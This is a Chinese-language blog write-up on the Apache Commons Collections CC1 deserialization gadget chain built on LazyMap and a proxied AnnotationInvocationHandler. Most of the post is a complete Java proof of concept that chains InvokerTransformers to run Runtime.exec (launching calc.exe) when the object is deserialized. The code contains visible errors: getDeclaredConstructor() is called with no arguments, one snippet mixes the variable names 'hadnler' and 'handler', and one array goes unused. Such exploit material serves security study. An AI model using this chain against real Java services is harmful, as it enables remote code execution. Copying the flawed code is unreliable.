LazyMap审计
LazyMap是什么?
LazyMap和TransformedMap类似,都来自于Common-Collections库,并继承自AbstractMapDecorator
而在LazyMap中,调用map.put()的方式是 当get方法里面在获取的值为空时,会使用factory.transfor()方法去获取值
public Object get(Object key) {
// create value for key if key is not currently in the map
if (map.containsKey(key) == false) {
Object value = factory.transform(key);
map.put(key, value);
return value;
}
return map.get(key);
}
AnnotationInvocationHandler类的invoke方法有调用到get
Java对象代理
Proxy.newProxyInstance 的第一个参数是ClassLoader,我们用默认的即可;第二个参数是我们需要
代理的对象集合;第三个参数是一个实现了InvocationHandler接口的对象,里面包含了具体代理的逻
辑。
Map proxyMap = (Map)Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},handler)
使用LazyMap构造利用链
首先使用LazyMap替换TransformedMap
Map outerMap = LazyMap.decorate(innerMap,transformerChain);
然后,对sun.reflect.annotation.AnnotationInvocationHandler对象进行Proxy
Class<?> clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> construct = clazz.getDeclaredConstructor(Class.class,Map.class);
construct.setAccessible(true);
InvocationHandler hadnler = (InvocationHandler)construct.newInstance(Retention.class,outerMap);
Map proxyMap = (Map)Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},handler);
POC
此POC在java8高版本中无法使用
则会显示java.lang.annotation.Retention missing element entrySet
这是由于AnnotationInvocationHandler在高版本中改变了readObject的逻辑,不再使用我们精心构造的LazyMap而是使用自己新建的LinkedHashMap,导致该对象无法获得entrySet的内容,所以会报前面的这个错误
package l0set;
import java.util.HashMap;
import java.util.Map;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
public class CC1 {
public static void main(String[] args) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(1),
};
Transformer[] fakeTransformer = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class}, new Object[]{null,new Object[0]}),
new InvokerTransformer("exec", new Class[]{String.class},new Object[]{"C:\\WINDOWS\\System32\\calc.exe"} ),
new ConstantTransformer(1),
};
Transformer transformerChain = new ChainedTransformer(fakeTransformer);
Map innerMap = new HashMap();
Map outerMap = LazyMap.decorate(innerMap, transformerChain);
Class<?> clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor<?> construct = clazz.getDeclaredConstructor();
construct.setAccessible(true);
InvocationHandler handler =(InvocationHandler) construct.newInstance(Retention.class,outerMap);
//代理
Map proxyMap = (Map)Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},handler);
handler = (InvocationHandler)construct.newInstance(Retention.class,proxyMap);
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(handler);
oos.close();
ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());
ObjectInputStream ois = new ObjectInputStream(bis);
Object o = (Object)ois.readObject();
}
}
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Antifrag!
